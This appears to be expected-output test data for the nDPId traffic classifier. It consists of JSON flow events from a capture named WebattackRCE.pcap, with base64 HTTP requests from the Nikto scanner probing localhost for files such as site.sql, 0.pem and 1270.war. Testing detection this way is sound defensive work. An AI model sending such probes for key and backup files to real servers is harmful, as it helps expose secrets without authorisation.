-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277321,"pkt":"AAAAAAAAAAAAAAAACABFAADAwiFAAEAGehR\/AAABfwAAAcS8H5DDVvqu6KD2KYAYAED+tAAAAQEICp1m\/XGdZv1xR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277322,"pkt":"AAAAAAAAAAAAAAAACABFAADBuGlAAEAGg8t\/AAABfwAAAcS+H5BzjYDWLFz9IYAYAED+tQAAAQEICp1m\/XKdZv1yR0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277324,"pkt":"AAAAAAAAAAAAAAAACABFAADB11JAAEAGZOJ\/AAABfwAAAcTAH5DtMO\/kM\/E\/tYAYAED+tQAAAQEICp1m\/XSdZv10R0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277325,"pkt":"AAAAAAAAAAAAAAAACABFAAC96FRAAEAGU+R\/AAABfwAAAcTCH5AdeNDi26Tri4AYAED+sQAAAQEICp1m\/XWdZv11R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277326,"pkt":"AAAAAAAAAAAAAAAACABFAAC95+5AAEAGVEp\/AAABfwAAAcTEH5Cz199gOp5CH4AYAED+sQAAAQEICp1m\/XadZv12R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277328,"pkt":"AAAAAAAAAAAAAAAACABFAADAqSFAAEAGkxR\/AAABfwAAAcTGH5DtDpGsIyeJWoAYAED+tAAAAQEICp1m\/XidZv14R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277329,"pkt":"AAAAAAAAAAAAAAAACABFAADA2JJAAEAGY6N\/AAABfwAAAcTIH5BNx+AlanMTuoAYAED+tAAAAQEICp1m\/XmdZv15R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277331,"pkt":"AAAAAAAAAAAAAAAACABFAADHC9ZAAEAGMFl\/AAABfwAAAcTKH5CiFTNhL7Iog4AYAED+uwAAAQEICp1m\/XqdZv16R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277333,"pkt":"AAAAAAAAAAAAAAAACABFAADHgXtAAEAGurN\/AAABfwAAAcTMH5Cx2rnNvwRWuoAYAED+uwAAAQEICp1m\/X2dZv19R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277334,"pkt":"AAAAAAAAAAAAAAAACABFAADFmcZAAEAGomp\/AAABfwAAAcTOH5DYYKFyIBNeYIAYAED+uQAAAQEICp1m\/X6dZv1+R0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277336,"pkt":"AAAAAAAAAAAAAAAACABFAADFO7NAAEAGAH5\/AAABfwAAAcTQH5BUXAMIX4xO7oAYAED+uQAAAQEICp1m\/YCdZv2AR0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 